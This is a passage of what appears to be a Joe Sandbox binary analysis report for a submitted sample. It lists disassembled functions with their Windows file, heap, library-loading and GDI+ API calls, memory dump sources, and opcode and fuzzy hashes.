                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID:
                                • API String ID: 3519838083-0
                                • Opcode ID: 1dce9ed280fb9474d371e2895a5337f61da178d14b4856dbbbaac61f3ce02f56
                                • Instruction ID: 75f108c865cd7f4d94f761f4a1c1ce60d352bbe0988bc7326e6b218776dc0a91
                                • Opcode Fuzzy Hash: 1dce9ed280fb9474d371e2895a5337f61da178d14b4856dbbbaac61f3ce02f56
                                • Instruction Fuzzy Hash: 8E4134B0805B409EE724DF798486AE7FBE5FF19300F544A6ED1EE83282DB326554CB25
                                Function 00D8B188 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D88FA5: GetLastError.KERNEL32(?,00DA0EE8,00D83E14,00DA0EE8,?,?,00D83713,00000050,?,00DA0EE8,00000200), ref: 00D88FA9
                                  • Part of subcall function 00D88FA5: _free.LIBCMT ref: 00D88FDC
                                  • Part of subcall function 00D88FA5: SetLastError.KERNEL32(00000000,?,00DA0EE8,00000200), ref: 00D8901D
                                  • Part of subcall function 00D88FA5: _abort.LIBCMT ref: 00D89023
                                  • Part of subcall function 00D8B2AE: _abort.LIBCMT ref: 00D8B2E0
                                  • Part of subcall function 00D8B2AE: _free.LIBCMT ref: 00D8B314
                                  • Part of subcall function 00D8AF1B: GetOEMCP.KERNEL32(00000000,?,?,00D8B1A5,?), ref: 00D8AF46
                                • _free.LIBCMT ref: 00D8B200
                                • _free.LIBCMT ref: 00D8B236
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: _free$ErrorLast_abort
                                • String ID:
                                • API String ID: 2991157371-0
                                • Opcode ID: 022ac33a66b9eb1769645e6971a236e9ca499c9ece440db77fc1902c55a83cee
                                • Instruction ID: eb8274baf031fef27c6ea218b843fee55ba156b157420d33ab2c11a805517829
                                • Opcode Fuzzy Hash: 022ac33a66b9eb1769645e6971a236e9ca499c9ece440db77fc1902c55a83cee
                                • Instruction Fuzzy Hash: CD31C231904208AFDB10FFA9D845BADBBE5EF45330F29409AE4149B3A1EB719D41DB70
                                Function 00D6971E Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00D69EDC,?,?,00D67867), ref: 00D697A6
                                • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00D69EDC,?,?,00D67867), ref: 00D697DB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                • Opcode ID: 15505968fc2ac70250500fb92a0a9845dae0502077b372f1761a2f4ee78234bf
                                • Instruction ID: c270149ab848a54d8d635c528b46efbaf9091fcb1645db139741c83847fa418b
                                • Opcode Fuzzy Hash: 15505968fc2ac70250500fb92a0a9845dae0502077b372f1761a2f4ee78234bf
                                • Instruction Fuzzy Hash: EE21F3B1110748AFE7308F64C885BA7B7ECEB49764F04492EF5E582192C375AC899B71
                                Function 00D69D62 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON
                                Download Yara Rule
                                APIs
                                • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00D67547,?,?,?,?), ref: 00D69D7C
                                • SetFileTime.KERNELBASE(?,?,?,?), ref: 00D69E2C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: File$BuffersFlushTime
                                • String ID:
                                • API String ID: 1392018926-0
                                • Opcode ID: e161e35e8d2bf6d93b91ced8f97489188667b1ad4a9cfb58d9fffb234068e9c0
                                • Instruction ID: 3bb9e2e7ade0f14867d27571be5b7673ffc563d9aa0a7102dfc483fefd7b65d9
                                • Opcode Fuzzy Hash: e161e35e8d2bf6d93b91ced8f97489188667b1ad4a9cfb58d9fffb234068e9c0
                                • Instruction Fuzzy Hash: EE21D671148246ABC714DE24C461AABFBE8AF55708F08482DB4C5C7181D339DA0DDFB1
                                Function 00D8A458 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00D8A4B8
                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D8A4C5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AddressProc__crt_fast_encode_pointer
                                • String ID:
                                • API String ID: 2279764990-0
                                • Opcode ID: d3ca4ccd3c34b08c7941666e76328eadc20001e774d2f902b1489746b10ab565
                                • Instruction ID: cb861ded359b7653f6b03ce41c908e46e18cae87c30c237ac8b20b37d0e41faa
                                • Opcode Fuzzy Hash: d3ca4ccd3c34b08c7941666e76328eadc20001e774d2f902b1489746b10ab565
                                • Instruction Fuzzy Hash: 16110633A112219BBF22EE2CEC4486A7395DB8472471A4622FD1DEB354EA70DC41C7F2
                                Function 00D69B59 Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                                Download Yara Rule
                                APIs
                                • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00D69B35,?,?,00000000,?,?,00D68D9C,?), ref: 00D69BC0
                                • GetLastError.KERNEL32 ref: 00D69BCD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ErrorFileLastPointer
                                • String ID:
                                • API String ID: 2976181284-0
                                • Opcode ID: 9f1153c40e844e64aaeae1bdeaf305c18b03ec3f3231efa12ae5d442fe0dd33b
                                • Instruction ID: b2eff64be839b60c3f0f038caaaa75d8d875fe00dc3dd744862a468299e6c4ac
                                • Opcode Fuzzy Hash: 9f1153c40e844e64aaeae1bdeaf305c18b03ec3f3231efa12ae5d442fe0dd33b
                                • Instruction Fuzzy Hash: AF01A1312043159B8B08CE6DBCE496AF39DEFC5721B18452EF956C7290CA31D8099A31
                                Function 00D69E40 Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                                Download Yara Rule
                                APIs
                                • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00D69E76
                                • GetLastError.KERNEL32 ref: 00D69E82
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ErrorFileLastPointer
                                • String ID:
                                • API String ID: 2976181284-0
                                • Opcode ID: 8794214d0844c5aa383f157b3123ddbbb31f6130425678646ff194985d320dd3
                                • Instruction ID: 2f8d867131816f4b4d745745d29f0885b47e2fb23e874891f98336ee128f46ab
                                • Opcode Fuzzy Hash: 8794214d0844c5aa383f157b3123ddbbb31f6130425678646ff194985d320dd3
                                • Instruction Fuzzy Hash: 7B019EB53063005BEB34DE29DC54B6BF6DD9B88314F18493EB146C3681DA32EC488630
                                Function 00D88606 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 00D88627
                                  • Part of subcall function 00D88518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D8C13D,00000000,?,00D867E2,?,00000008,?,00D889AD,?,?,?), ref: 00D8854A
                                • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00DA0F50,00D6CE57,?,?,?,?,?,?), ref: 00D88663
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Heap$AllocAllocate_free
                                • String ID:
                                • API String ID: 2447670028-0
                                • Opcode ID: 44a7e6f3ba338569d883e73218a1fb93940251e04e99126e842eb56389e649ae
                                • Instruction ID: a436cb418d46f05ecc8aa74eeff30a2961660f4dabece6684e5a46ac9a5a49e1
                                • Opcode Fuzzy Hash: 44a7e6f3ba338569d883e73218a1fb93940251e04e99126e842eb56389e649ae
                                • Instruction Fuzzy Hash: E6F0CD32241216AACB213A25AC02F6F6768DF92BB0FA84116F85496191FF20CC00B7B4
                                Function 00D70908 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(?,?), ref: 00D70915
                                • GetProcessAffinityMask.KERNEL32(00000000), ref: 00D7091C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Process$AffinityCurrentMask
                                • String ID:
                                • API String ID: 1231390398-0
                                • Opcode ID: 64fee3f3cd886bddb936187a83ed9189cce87e5aeab8261afbb1ae1deb8ccb09
                                • Instruction ID: 04229e7b5a45befb91ebb03e1995bb101e82ff558d12347eb181dc7698499d77
                                • Opcode Fuzzy Hash: 64fee3f3cd886bddb936187a83ed9189cce87e5aeab8261afbb1ae1deb8ccb09
                                • Instruction Fuzzy Hash: ECE09B36A10105EB6F05CAA49C044BB7B9DDB0421071C817ABA0ED3241F770DD018E70
                                Function 00D6A444 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                Download Yara Rule
                                APIs
                                • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D6A27A,?,?,?,00D6A113,?,00000001,00000000,?,?), ref: 00D6A458
                                • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D6A27A,?,?,?,00D6A113,?,00000001,00000000,?,?), ref: 00D6A489
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                • Opcode ID: 821d3f81cac55657c2cee26158d135caa0f3f73f3972ace0cb4929145ca368b0
                                • Instruction ID: 247ea3949b77df5b370d6aa09adceb134a1299b54f591ef051532c0f9b4a1946
                                • Opcode Fuzzy Hash: 821d3f81cac55657c2cee26158d135caa0f3f73f3972ace0cb4929145ca368b0
                                • Instruction Fuzzy Hash: DEF01C312402097BDF115EA5DC45BD9776CAB04385F488052BC8CD6261DB769EA8AA71
                                Function 00D7D573 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ItemText_swprintf
                                • String ID:
                                • API String ID: 3011073432-0
                                • Opcode ID: 0cad09f5fcbd4fcfcdbf8c024e3cfe8ce461d8c516383b7080408f6ca923cba5
                                • Instruction ID: e4883802f8a9a213ce3f1ebe408be7d723302a6458b0106332828f6b917e5ec8
                                • Opcode Fuzzy Hash: 0cad09f5fcbd4fcfcdbf8c024e3cfe8ce461d8c516383b7080408f6ca923cba5
                                • Instruction Fuzzy Hash: 61F05C319003483BDB11AB709C02FAD371EDB09745F040581B604971A1E9716E204771
                                Function 00D6A12D Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                                Download Yara Rule
                                APIs
                                • DeleteFileW.KERNELBASE(?,?,?,00D6984C,?,?,00D69688,?,?,?,?,00D91FA1,000000FF), ref: 00D6A13E
                                • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00D6984C,?,?,00D69688,?,?,?,?,00D91FA1,000000FF), ref: 00D6A16C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: DeleteFile
                                • String ID:
                                • API String ID: 4033686569-0
                                • Opcode ID: 3e96efc4dc68cd4cc4006f6db166f917619be78babac38f23887257ac2b0af2e
                                • Instruction ID: f1b38bbb08a1dd635c15eb40c3dcbe62767ca091cd713b6d38a0bf08bc82b3b4
                                • Opcode Fuzzy Hash: 3e96efc4dc68cd4cc4006f6db166f917619be78babac38f23887257ac2b0af2e
                                • Instruction Fuzzy Hash: 8DE092356803086BDB119F64DC42FE9775CEB09382F484066B888D7160EB61DDD4AEB1
                                Function 00D7A39D Relevance: 3.0, APIs: 2, Instructions: 27comCOMMON
                                Download Yara Rule
                                APIs
                                • GdiplusShutdown.GDIPLUS(?,?,?,?,00D91FA1,000000FF), ref: 00D7A3D1
                                • OleUninitialize.OLE32(?,?,?,?,00D91FA1,000000FF), ref: 00D7A3D6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: GdiplusShutdownUninitialize
                                • String ID:
                                • API String ID: 3856339756-0
                                • Opcode ID: 76904860264f2cef3b4dcb69ff46c0bf72b7e39619751e404ac8bcd7c129ee7a
                                • Instruction ID: 6399e01a51c9b98dd648859fef60a28210f072a25afb60a639a6ccd5b2b8ce13
                                • Opcode Fuzzy Hash: 76904860264f2cef3b4dcb69ff46c0bf72b7e39619751e404ac8bcd7c129ee7a
                                • Instruction Fuzzy Hash: FFF03932A18759EFC7109B4CDC05B19FBA9FB8AB20F04436AF419C3760CB786810CAA5
                                Function 00D6A194 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                Download Yara Rule
                                APIs
                                • GetFileAttributesW.KERNELBASE(?,?,?,00D6A189,?,00D676B2,?,?,?,?), ref: 00D6A1A5
                                • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00D6A189,?,00D676B2,?,?,?,?), ref: 00D6A1D1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                • Opcode ID: b26bfc791873c0b8fc4051f5869deabefd6965765295988d0b8d3e3012835975
                                • Instruction ID: 4dfe254c48d2ba3aa2f13c2787643a26b6189cbba796470381bad6e3828b4603
                                • Opcode Fuzzy Hash: b26bfc791873c0b8fc4051f5869deabefd6965765295988d0b8d3e3012835975
                                • Instruction Fuzzy Hash: 97E09B359002185BCB10ABA8DC05BD5775CEB093E1F0441A2FD49E7290D7709D449AF1
                                Function 00D70085 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D700A0
                                • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D6EB86,Crypt32.dll,00000000,00D6EC0A,?,?,00D6EBEC,?,?,?), ref: 00D700C2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: DirectoryLibraryLoadSystem
                                • String ID:
                                • API String ID: 1175261203-0
                                • Opcode ID: f0ad97b6a9fbdd2cb3afb8be669c191c7d7653690db1f5e15259db8270982436
                                • Instruction ID: 1b0c1185b7d5af296f382d2ba750f28481705fcbcd572c695e4ab776a78b4d4a
                                • Opcode Fuzzy Hash: f0ad97b6a9fbdd2cb3afb8be669c191c7d7653690db1f5e15259db8270982436
                                • Instruction Fuzzy Hash: DCE0127690125C6BDB219AA49C09FD7776CEF0D392F0440A7BA4CD3144EA749A948BB0
                                Function 00D79B0F Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
                                Download Yara Rule
                                APIs
                                • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D79B30
                                • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00D79B37
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: BitmapCreateFromGdipStream
                                • String ID:
                                • API String ID: 1918208029-0
                                • Opcode ID: da8dd3713c185dc73ef861a0086ae73744bb6b1657ee0415cc750eb8a0798155
                                • Instruction ID: 0d0d5dd5ed1ac18ea370282c45b02de57ebc0cb7a6bc9f8ab1ed06f42f020a4f
                                • Opcode Fuzzy Hash: da8dd3713c185dc73ef861a0086ae73744bb6b1657ee0415cc750eb8a0798155
                                • Instruction Fuzzy Hash: 54E0ED72901218EBCB10DF98D541A99B7ECEB09321F10C09BE89993301E671AE049BB5
                                Function 00D8215C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D8329A: try_get_function.LIBVCRUNTIME ref: 00D832AF
                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D8217A
                                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00D82185
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
